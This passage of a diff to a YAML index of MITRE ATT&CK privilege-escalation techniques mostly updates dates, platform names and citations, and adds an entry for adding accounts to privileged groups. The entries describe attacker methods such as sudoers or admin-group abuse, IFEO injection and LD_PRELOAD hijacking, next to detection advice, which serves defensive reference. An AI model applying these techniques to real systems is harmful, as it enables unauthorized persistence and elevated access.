       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -17126,7 +17393,77 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.003:
     technique:
@@ -17149,7 +17486,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -17197,8 +17534,6 @@ privilege-escalation:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1546.011:
@@ -17230,7 +17565,7 @@ privilege-escalation:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -17285,13 +17620,11 @@ privilege-escalation:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17352,9 +17685,9 @@ privilege-escalation:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -17363,7 +17696,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -17416,7 +17748,7 @@ privilege-escalation:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17437,12 +17769,11 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -17545,7 +17876,6 @@ privilege-escalation:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1611:
@@ -17645,12 +17975,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1611
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17663,7 +17992,6 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -17676,7 +18004,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -17706,7 +18033,8 @@ privilege-escalation:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1547.005:
@@ -17733,7 +18061,7 @@ privilege-escalation:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17759,13 +18087,11 @@ privilege-escalation:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -17842,12 +18168,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -17866,6 +18191,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -17873,7 +18199,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -17893,34 +18218,36 @@ privilege-escalation:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -17956,6 +18283,10 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -17967,16 +18298,12 @@ privilege-escalation:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -18012,12 +18339,12 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -18025,14 +18352,13 @@ privilege-escalation:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -18047,6 +18373,7 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -18055,18 +18382,18 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -18098,9 +18425,6 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -18172,7 +18496,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -18199,7 +18522,7 @@ privilege-escalation:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -18225,13 +18548,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -18352,12 +18673,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -18389,11 +18709,10 @@ privilege-escalation:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -18434,11 +18753,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -18494,12 +18812,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18556,7 +18873,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1547.004:
@@ -18626,7 +18942,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -18736,7 +19051,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -18790,7 +19104,7 @@ privilege-escalation:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -18823,13 +19137,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -18891,10 +19203,9 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -18952,7 +19263,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -18994,7 +19304,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -19053,8 +19363,6 @@ privilege-escalation:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.005:
     technique:
@@ -19084,7 +19392,7 @@ privilege-escalation:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -19119,12 +19427,10 @@ privilege-escalation:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19201,7 +19507,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1055.004:
@@ -19240,7 +19545,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
